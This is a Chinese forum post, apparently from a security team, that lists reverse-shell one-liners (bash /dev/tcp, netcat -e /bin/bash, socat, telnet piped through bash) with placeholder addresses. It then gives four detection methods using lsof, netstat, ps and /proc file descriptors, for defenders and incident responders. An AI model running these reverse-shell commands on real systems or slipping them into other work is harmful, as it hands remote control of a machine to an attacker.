【NB团队】反弹shell与检测方法

前言
前面帖子写了微信小程序漏洞挖掘，当中使用了反弹shell，那么这个帖子就来写一下反弹shell和检测方法吧。

因为我们在渗透测试的时候，我们经常会用到反弹shell，去进行一个后续的利用，今天在防守的角度，去查看一下如何分析反弹shell的检测，在应急响应，分析攻击手法的时候，也会使用到。

正文
这里先来列举一下反弹shell的各种形式。

1.bash反弹shell
bash -i >& /dev/tcp/xxx.xxx.xxx.xxxx/xxx 0>&1

2.netcat反弹shell
netcat xx.xxx.xxx.x xxxx -e /bin/bash# nc   -e /bin/bash

3.Socat反弹shell
socat tcp-connect:xxx.xxx.xxx.xxx:xxxx exec:'bash -li',pty,stderr,setsid,sigint,sane

4.telnet反弹shell（楼主常用）
telnet xx.xxx.xxx.xxx xxxx | /bin/bash | telnet xxx.xx.xxx.xxx xxxx

关于反弹shell的方式还是有很多的，这里不列举过多。

第一种检测的方式:
通过lsof进行检测
lsof -n | grep ESTABLISHED |grep -E '0u|1u|2u'
反弹SHELL的本质就是0 1 2文件描述符的重定向，因此检测0 1 2文件描述符有没有重定向到远端地址就可以大致判断是否使用了反弹SHELL
（如列图2）

第二种检测方式:
netstat -anop  |grep ESTABLISHED
这里是查看有无bash/sh连接到远端地址
（如列图3）

第三种检测方法，直接通过ps -ef，查看有无反弹shell的常见命令。
（如列图4）

第四种检测方式，通过ls -al /proc/xxx/fd,通过查看fd，有无连接到远端地址，这里有些时候会用到pipe来执行命令，需要继续跟踪pipe.
（如列图5）